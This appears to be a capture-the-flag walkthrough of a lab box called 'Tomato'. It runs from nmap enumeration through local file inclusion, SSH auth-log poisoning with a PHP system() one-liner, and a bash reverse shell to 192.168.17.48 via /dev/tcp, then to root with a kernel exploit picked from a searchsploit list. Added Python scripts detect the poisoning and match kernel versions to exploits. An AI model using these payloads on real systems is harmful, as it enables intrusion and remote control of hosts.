Enumeration

Determine the IP address

Host discovery with nmap:

nmap -sn 10.1.1.0/24

Nmap scan report for 10.1.1.69
Host is up (0.00089s latency).

The target's IP is 10.1.1.69.

Port scanning and service enumeration

Full TCP port scan, enumerating service and operating-system information at the same time:

nmap -vv --reason -Pn -A --osscan-guess --version-all -p- 10.1.1.69

PORT     STATE SERVICE REASON         VERSION
21/tcp   open  ftp     syn-ack ttl 63 vsftpd 3.0.3
80/tcp   open  http    syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tomato
2211/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d2:53:0a:91:8c:f1:a6:10:11:0d:9e:0f:22:f8:49:8e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDWlaPDFzZw57482HON5cSi7r32bM0suv/W/UDSY5vhwZVUE3f2uWmYsxXWrZTDRjKkzEay90N+X7d22SOGuMLhUNSowjsciLzEwymx2pnj3brhQvXOmzMNl9+QmJl0nJ2OrIJ946Rz1zTTh208gj0tFKK8PmAtrHVKithkKDFiW3yt9IM41X/ECjn7rG3rFsz3IB0x5vMEpkFennAfLL3odCCeb49wDXOpmZ9tiadpBmqKdgQr3NSRZ82lTgLGism9iWK5gUDdw/2PCBYQcL8eYRJxkYKhqcGJ4h8ieMjn0L+EpEleA3y7qQtClhZ9LFeaKhOoUe6fjFszqBZwMCqp
|   256 b3:12:60:32:48:28:eb:ac:80:de:17:d7:96:77:6e:2f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPTQBx5f7oumXmo4oI/1UcCQcbsuDeltX8HhjGszH52b43ALRnIolE7tp2lL3RRcDPYFCP6TYiFTiI5BTItFxjM=
|   256 36:6f:52:ad:fe:f7:92:3e:a2:51:0f:73:06:8d:80:13 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIO+ijwjZgKJrKtJ1LCS0tHecORlikMHQY36bDmZ7fX9Y
8888/tcp open  http    syn-ack ttl 63 nginx 1.10.3 (Ubuntu)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Private Property
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: 401 Authorization Required
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.11 - 4.1

Only ports 21, 80, 2211 and 8888 are open, running ftp, Apache, OpenSSH and nginx respectively.

Scan of the 20 most common UDP ports:

nmap -vv --reason -Pn -sU -A --top-ports=20 --version-all 10.1.1.69

PORT      STATE         SERVICE      REASON              VERSION
53/udp    closed        domain       port-unreach ttl 63
67/udp    closed        dhcps        port-unreach ttl 63
68/udp    open|filtered dhcpc        no-response
69/udp    open|filtered tftp         no-response
123/udp   open|filtered ntp          no-response
135/udp   closed        msrpc        port-unreach ttl 63
137/udp   closed        netbios-ns   port-unreach ttl 63
138/udp   closed        netbios-dgm  port-unreach ttl 63
139/udp   open|filtered netbios-ssn  no-response
161/udp   closed        snmp         port-unreach ttl 63
162/udp   closed        snmptrap     port-unreach ttl 63
445/udp   closed        microsoft-ds port-unreach ttl 63
500/udp   open|filtered isakmp       no-response
514/udp   closed        syslog       port-unreach ttl 63
520/udp   closed        route        port-unreach ttl 63
631/udp   closed        ipp          port-unreach ttl 63
1434/udp  open|filtered ms-sql-m     no-response
1900/udp  closed        upnp         port-unreach ttl 63
4500/udp  open|filtered nat-t-ike    no-response
49152/udp closed        unknown      port-unreach ttl 63

Port 21 enumeration

Anonymous login is not allowed, and nothing else was found.

Port 80 enumeration

The homepage is just a single image, and nothing unusual was found in it:

[image: tomato]

Directory scan with dirb:

dirb http://10.1.1.69

---- Scanning URL: http://10.1.1.69/ ----
==> DIRECTORY: http://10.1.1.69/antibot_image/
+ http://10.1.1.69/index.html (CODE:200|SIZE:652)
+ http://10.1.1.69/server-status (CODE:403|SIZE:274)

---- Entering directory: http://10.1.1.69/antibot_image/ ----

A readable directory /antibot_image was found:

[image: antibots]

Its info.php contains an include statement, so it is suspected to allow local file inclusion:

[image: info]

/etc/passwd can be read, but RFI does not work:

[image: passwd]

Port 8888

It requires authentication, and the password is unknown:

[image: 8888]

Initial Shell

Try to get a shell through LFI with log poisoning. After some testing, /var/log/auth.log turned out to be readable:

[image: auth_log]

Log in over SSH with a PHP one-liner as the username to poison the log:

ssh '<?php system($_GET["cmd"]); ?>'@10.1.1.69

Try running the id command; it succeeds:

[image: id]

Run a bash reverse-shell payload and get the shell back:

http://10.1.1.69/antibot_image/antibots/info.php?image=/var/log/auth.log&cmd=exec bash -c "bash -i >/dev/tcp/192.168.17.48/8080 0>&1"

[image: rev]

Initial shell obtained.
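The log-poisoning chain above leaves two traces a defender can look for: an sshd "Invalid user" entry whose attempted username carries a PHP open tag, and a web request whose include parameter points at a log file, with a cmd parameter riding along. The following Python script is an added example, not part of the original walkthrough or of any tool it uses; the auth.log and Apache access-log lines it scans are constructed samples modelled on this box, and the function names are my own.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines modelled on the walkthrough (not real captures):
# a normal failed login, the poisoned sshd "Invalid user" entry, and the
# follow-up web requests that include /etc/passwd and /var/log/auth.log.
AUTH_LOG = """\
Jun  1 10:00:01 tomato sshd[1201]: Invalid user bob from 192.168.17.48 port 50120
Jun  1 10:00:07 tomato sshd[1202]: Invalid user <?php system($_GET["cmd"]); ?> from 192.168.17.48 port 50122
Jun  1 10:00:09 tomato sshd[1202]: Failed password for invalid user <?php system($_GET["cmd"]); ?> from 192.168.17.48 port 50122 ssh2
Jun  1 10:01:00 tomato sshd[1210]: Accepted publickey for admin from 10.1.1.5 port 40000 ssh2
"""

ACCESS_LOG = """\
10.1.1.5 - - [01/Jun/2021:10:02:00 +0000] "GET /antibot_image/antibots/info.php?image=image.png HTTP/1.1" 200 512
192.168.17.48 - - [01/Jun/2021:10:02:10 +0000] "GET /antibot_image/antibots/info.php?image=/etc/passwd HTTP/1.1" 200 1400
192.168.17.48 - - [01/Jun/2021:10:02:20 +0000] "GET /antibot_image/antibots/info.php?image=/var/log/auth.log&cmd=id HTTP/1.1" 200 9000
"""

# PHP open tags: "<?php" or the short echo form "<?="
PHP_TAG = re.compile(r"<\?(?:php|=)", re.IGNORECASE)
# sshd records the attempted username verbatim, which is what makes poisoning possible
SSHD_USER = re.compile(
    r"sshd\[\d+\]: (?:Invalid user|Failed password for invalid user) (.+?) from (\S+)"
)
# Common Log Format: client, ident, user, [timestamp], "METHOD target HTTP/x"
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/')
# Files an image-include parameter has no business pointing at
LFI_TARGETS = ("/var/log/", "/etc/", "/proc/self/")


def poisoned_auth_entries(text: str) -> List[Dict[str, object]]:
    """Return sshd auth-log entries whose attempted username contains a PHP open tag."""
    hits = []
    for number, line in enumerate(text.splitlines(), 1):
        m = SSHD_USER.search(line)
        if m and PHP_TAG.search(m.group(1)):
            hits.append({"line": number, "user": m.group(1), "src": m.group(2)})
    return hits


def lfi_requests(text: str) -> List[Dict[str, object]]:
    """Flag requests whose query values name a sensitive path or traverse directories.

    Each hit also records whether a 'cmd' parameter was present, the sign that a
    poisoned log is being used for command execution rather than plain disclosure.
    """
    hits = []
    for line in text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        src, target = m.groups()
        parts = urlsplit(target)
        query = parse_qs(parts.query, keep_blank_values=True)  # parse_qs URL-decodes values
        for param, values in query.items():
            for value in values:
                if value.startswith(LFI_TARGETS) or "../" in value:
                    hits.append({
                        "src": src,
                        "path": parts.path,
                        "param": param,
                        "value": value,
                        "with_cmd": "cmd" in query,
                    })
    return hits


if __name__ == "__main__":
    for hit in poisoned_auth_entries(AUTH_LOG):
        print(f"auth.log line {hit['line']}: PHP tag in username from {hit['src']}: {hit['user']!r}")
    for hit in lfi_requests(ACCESS_LOG):
        print(f"{hit['src']} -> {hit['path']} {hit['param']}={hit['value']} cmd={hit['with_cmd']}")
```

The two signals are worth correlating: a PHP tag in an sshd username is noise on its own, but the same source address then requesting /var/log/auth.log through an include parameter is the point at which the poisoned entry becomes executable. On the application side the fix is to never pass a request value to include; resolve an allowlisted filename inside the image directory instead.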

Privilege escalation

Enumerating with linpeas turned up an nginx password hash; a quick cracking attempt yielded nothing, so attention turned to the kernel:

[+] Operative system
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits
Linux version 4.4.0-21-generic (buildd@lgw01-21) (gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2) ) #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016
Distributor ID: Ubuntu
Description:    Ubuntu 16.04 LTS
Release:        16.04
Codename:       xenial

Search for exploits:

| Exploit Title | Path |
|---|---|
| Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation | solaris/local/15962.c |
| Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - 'Sendpage' Local Privilege Escalation (Metasploit) | linux/local/19933.rb |
| Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5) | linux/local/9479.c |
| Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1) | linux_x86/local/9542.c |
| Linux Kernel 3.10/3.18 /4.4 - Netfilter IPT_SO_SET_REPLACE Memory Corruption | linux/dos/39545.txt |
| Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Local Privilege Escalation | linux/local/41995.c |
| Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free | linux/dos/43234.c |
| Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit) | linux/local/40759.rb |
| Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak | linux/dos/46529.c |
| Linux Kernel 4.4 - 'rtnetlink' Stack Memory Disclosure | linux/local/46006.c |
| Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation | linux_x86-64/local/40871.c |
| Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC) | linux/dos/41457.c |
| Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation | linux/local/41458.c |
| Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bounds Privilege Escalation | linux_x86-64/local/40049.c |
| Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Condition Privilege Escalation | windows_x86-64/local/47170.c |
| Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (1) | linux/local/39277.c |
| Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (2) | linux/local/40003.c |
| Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation | linux/local/39772.txt |
| Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation | linux/local/41886.c |
| Linux Kernel < 3.4.5 (Android 4.2.2/4.4 ARM) - Local Privilege Escalation | arm/local/31574.c |
| Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service | linux/dos/42136.c |
| Linux kernel < 4.10.15 - Race Condition Privilege Escalation | linux/local/43345.c |
| Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation | linux/local/45553.c |
| Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC) | linux/dos/42762.txt |
| Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c |
| Linux Kernel < 4.14.rc3 - Local Denial of Service | linux/dos/42932.c |
| Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak | linux/local/44325.c |
| Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption | linux/dos/44832.txt |
| Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free | linux/dos/44579.c |
| Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c |
| Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation | linux_x86-64/local/44300.c |
| Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP) | linux/local/43418.c |
| Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP) | linux/local/47169.c |
| Linux Kernel < 4.5.1 - Off-By-One (PoC) | linux/dos/44301.c |

There is no gcc on the machine, so the exploit had to be compiled elsewhere and uploaded; after some trial and error, 45010 was chosen. Running it gives root:

[image: root]
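The privilege-escalation step boils down to comparing the kernel banner linpeas printed (4.4.0-21) against the version windows in the searchsploit titles. The Python below is an added example, not code from the walkthrough or from searchsploit or linpeas; it treats Ubuntu's ABI number after the dash as a fourth version component so that 4.4.0-21 compares below 4.4.0-116. The bounds in KNOWN_LPE are copied only from the exploit titles listed on this page, the paths are quoted as printed there, and KernelVersion, parse_kernel_version and applicable_lpe are names I chose.

```python
import re
from typing import List, NamedTuple, Optional, Tuple


class KernelVersion(NamedTuple):
    """Kernel version as comparable integers; abi is Ubuntu's number after the dash (0 if absent)."""
    major: int
    minor: int
    patch: int
    abi: int


VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:-(\d+))?")


def parse_kernel_version(text: str) -> KernelVersion:
    """Pull the first kernel version out of 'uname -r' output or a 'Linux version ...' banner."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no kernel version found in {text!r}")
    major, minor, patch, abi = m.groups()
    return KernelVersion(int(major), int(minor), int(patch), int(abi or 0))


# (path as printed by searchsploit, lowest affected version or None, first version the
# title reports as fixed). Bounds are copied from the exploit titles on this page only;
# they are a triage hint for the 4.4 series, not a patch database.
LocalPrivEsc = Tuple[str, Optional[str], str]
KNOWN_LPE: List[LocalPrivEsc] = [
    ("linux/local/45010.c", None, "4.4.0-116"),                # "< 4.4.0-116 (Ubuntu 16.04.4)"
    ("linux/local/44298.c", None, "4.4.0-116"),                # "< 4.4.0-116 (Ubuntu 16.04.4)"
    ("linux/local/43418.c", None, "4.4.0-83"),                 # "< 4.4.0-83" (4.4 bound only)
    ("windows_x86-64/local/47170.c", "4.4.0-21", "4.4.0-51"),  # "4.4.0-21 < 4.4.0-51"
]


def applicable_lpe(running: KernelVersion,
                   catalogue: List[LocalPrivEsc] = KNOWN_LPE) -> List[str]:
    """Return catalogue entries whose version window contains the running kernel."""
    hits = []
    for path, lowest, fixed in catalogue:
        above_low = lowest is None or running >= parse_kernel_version(lowest)
        if above_low and running < parse_kernel_version(fixed):
            hits.append(path)
    return hits


if __name__ == "__main__":
    # The banner linpeas printed on this box
    banner = ("Linux version 4.4.0-21-generic (buildd@lgw01-21) "
              "(gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2) ) #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016")
    running = parse_kernel_version(banner)
    print(f"running kernel: {running}")
    for path in applicable_lpe(running):
        print(f"  unpatched against {path}")
```

A version string is only a triage signal; distributions backport fixes, and the walkthrough itself needed several attempts before 45010 worked. The useful defender reading is the opposite direction: a 4.4.0-21 kernel on a 16.04 host sits far below every fixed version in the table, which is the patch gap to close.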